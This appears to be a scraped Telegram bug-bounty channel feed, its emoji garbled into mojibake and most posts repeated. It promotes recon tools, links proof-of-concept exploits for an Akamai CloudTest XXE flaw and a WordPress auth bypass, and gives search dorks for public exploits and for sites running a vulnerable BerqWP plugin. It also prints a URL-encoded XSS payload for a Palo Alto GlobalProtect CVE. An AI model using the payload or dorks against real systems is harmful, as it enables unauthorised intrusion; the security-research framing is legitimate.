βCYFARE-Reconner - Advanced Link Reconnaissance Extension For Firefox
β¨ Features
Deep Discovery
Secret Detection
URL Analysis
β https://github.com/CYFARE/CYFARE-Reconner
β¨ Features
Deep Discovery
Secret Detection
URL Analysis
β https://github.com/CYFARE/CYFARE-Reconner
β€12π2
Akamai CloudTest - XXE Injection
Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection through the /concerto/services/RepositoryService SOAP endpoint.
Get: https://github.com/MuhammadWaseem29/CVE-2025-49493-Poc
References:
1. https://xbow.com/blog/xbow-akamai-cloudtest-xxe/
2. https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes
Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection through the /concerto/services/RepositoryService SOAP endpoint.
Get: https://github.com/MuhammadWaseem29/CVE-2025-49493-Poc
References:
1. https://xbow.com/blog/xbow-akamai-cloudtest-xxe/
2. https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes
π₯5β€4
Looking for a freelancer, familiar with FB, Instagram and Whatsapp marketing.
Send your resume to [email protected]
Send your resume to [email protected]
π¨CVE-2025-0133 : Payload + Template
Payload:
Write-up: https://codewithvamp.medium.com/cve-2025-0133-reflected-xss-vulnerability-in-palo-alto-globalprotect-gateway-portal-028128f2f5b9
Template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml
Payload:
%3Csvg%20xmlns%3D%22http%3A%2F%https://2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3EWrite-up: https://codewithvamp.medium.com/cve-2025-0133-reflected-xss-vulnerability-in-palo-alto-globalprotect-gateway-portal-028128f2f5b9
Template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml
β€7π4
β‘οΈAWS PENTESTING NOTES
βhttps://docs.google.com/spreadsheets/d/1PfxDsIcORE4NYi_vY_T9Sdq3ZooDRvco/htmlview#
β
Google Docs
AWS Pentesting Notes.xlsx
β€10π₯5π³1
β³ s3dns - a lightweight DNS server that helps uncover cloud storage buckets (AWS S3, Google Cloud Storage, and Azure Blob) by resolving DNS requests, tracing CNAMEs, and matching known bucket URL patterns.
What it does?
β’ Resolves CNAME records to uncover hidden S3 locations
β’ Detects AWS S3 bucket URL patterns
β’ Helps find potentially exposed S3 buckets
β’ Easy to deploy via Docker
Installation
Repository: Github
What it does?
β’ Resolves CNAME records to uncover hidden S3 locations
β’ Detects AWS S3 bucket URL patterns
β’ Helps find potentially exposed S3 buckets
β’ Easy to deploy via Docker
Installation
git clone https://github.com/olizimmermann/s3dns.git
cd s3dns
pip install -r requirements.txt
Repository: Github
β€10π4πΏ3
π± Android Native Scanner β automatically detects RCE, tokens, API keys, URLs & base64 payloads inside .so files!
π Features:
𧨠system, exec, popen β RCE scoring
π API key / token / JWT detection
π Extracts hardcoded URLs & endpoints
𧬠JNI & native method scanner
π Auto-generated TXT reports
π Project β
https://github.com/ynsmroztas/AndroidNativeScanner
π£ No more manual hunting in .so files.
β‘ One script, full visibility.
π Features:
𧨠system, exec, popen β RCE scoring
π API key / token / JWT detection
π Extracts hardcoded URLs & endpoints
𧬠JNI & native method scanner
π Auto-generated TXT reports
π Project β
https://github.com/ynsmroztas/AndroidNativeScanner
π£ No more manual hunting in .so files.
β‘ One script, full visibility.
β€17π5π₯4π’1
Hey Hunter's,
DarkShadow here, back again just dropping a POC.
π€«Unauthenticated WordPress Auth bypass π₯
ο»Ώ
#bugbountytips #authbypass
DarkShadow here, back again just dropping a POC.
π€«Unauthenticated WordPress Auth bypass π₯
After sending the 1st request use the provided last Cookie and send request on /wp-admin and BOOM auth bypassed π₯
ο»Ώ
#bugbountytips #authbypass
π₯20β€7πΏ5π2
Hey Hunter's,
DarkShadow here back again, just dropping a dorkπ€«
β¨google dork searching public exploits from githubπ
#dork #bugbountytips
DarkShadow here back again, just dropping a dorkπ€«
β¨google dork searching public exploits from githubπ
"CVE-YYYY-NNNN" exploit site:github.com
"CVE-YYYY-NNNN" exploit POC site:github.com
"CVE-YYYY-NNNN" proof of concept site:github.com
#dork #bugbountytips
β€10π7π₯4
π¨ Brut Security - New Batch Starts 18th August!
Join our Ethical Hacking Network Pentesting & Web Pentesting / Bug Bounty training β practical sessions, real-world attacks, and community support from Day 1.
β DM +918945971332 to enroll. Limited slots.
βhttps://wa.me/918945971332
Join our Ethical Hacking Network Pentesting & Web Pentesting / Bug Bounty training β practical sessions, real-world attacks, and community support from Day 1.
β DM +918945971332 to enroll. Limited slots.
βhttps://wa.me/918945971332
WhatsApp.com
Brut Security
Business Account
β€7
Hey Hunter's,
DarkShadow hare back again.
πΏππ§π ππ£ππππ£πππ§ my own private tool which i used to extract endpoints from browse through passive recon.
β¨ Features:
β Extract subdomains.
β Extract categories endpoints from subdomains.
β Extract external domains.
If you find this tool useful, give it a βοΈ and share it with others in the hacking & BugBounty community!
https://github.com/darkshadow2bd/DarkEndFinder
DarkShadow hare back again.
πΏππ§π ππ£ππππ£πππ§ my own private tool which i used to extract endpoints from browse through passive recon.
β¨ Features:
β Extract subdomains.
β Extract categories endpoints from subdomains.
β Extract external domains.
If you find this tool useful, give it a βοΈ and share it with others in the hacking & BugBounty community!
https://github.com/darkshadow2bd/DarkEndFinder
GitHub
GitHub - darkshadow2bd/DarkEndFinder: BookMark and Find Subdomains, Endpoints, External Domains in your web browser.
BookMark and Find Subdomains, Endpoints, External Domains in your web browser. - GitHub - darkshadow2bd/DarkEndFinder: BookMark and Find Subdomains, Endpoints, External Domains in your web browser.
β€16π3π¨βπ»3π2
CVE-2025-7443: Unrestricted Upload of File with Dangerous Type in BerqWP Plugin, 8.1 ratingβοΈ
Lack of file validation allows attackers to upload arbitrary files, which can lead to RCE.
Search at Netlas.io:
π Link: https://nt.ls/puxoz
π Dork: http.body:"plugins/searchpro"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-2242-unauthenticated-arbitrary-file-upload
Lack of file validation allows attackers to upload arbitrary files, which can lead to RCE.
Search at Netlas.io:
π Link: https://nt.ls/puxoz
π Dork: http.body:"plugins/searchpro"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-2242-unauthenticated-arbitrary-file-upload
π¨βπ»6β€3π«‘2
π¨βπ³ Damn-Vulnerable-RESTaurant π¨βπ³
β‘οΈAn intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.
β Get: https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game
β‘οΈAn intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.
β Get: https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game
π₯14β€12
Media is too big
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow here back again!
SubClick One-click Subdomain Finder Bookmark template.
π§ Features
β One-click execution β just add to bookmarks and click
β No setup required β works as a browser bookmarklet
β Fast subdomain discovery from multiple public sources
β Subdomain live check (best-effort, despite CORS/CSP)
β Download results as .txt directly from the browser
β Displays subdomains as clickable links with basic status
β Fully client-side β no server or data collection involved
β Bug bounty friendly β made for recon & live target scanning
#bugbountytips #infosec
DarkShadow here back again!
SubClick One-click Subdomain Finder Bookmark template.
This is my private tool that I use during bug hunting.
If you guys like it, Iβll publish it on my GitHub.
Iβve uploaded a sample video demo β let me know what you think!
π§ Features
β One-click execution β just add to bookmarks and click
β No setup required β works as a browser bookmarklet
β Fast subdomain discovery from multiple public sources
β Subdomain live check (best-effort, despite CORS/CSP)
β Download results as .txt directly from the browser
β Displays subdomains as clickable links with basic status
β Fully client-side β no server or data collection involved
β Bug bounty friendly β made for recon & live target scanning
#bugbountytips #infosec
π€13β€7π«‘4π₯2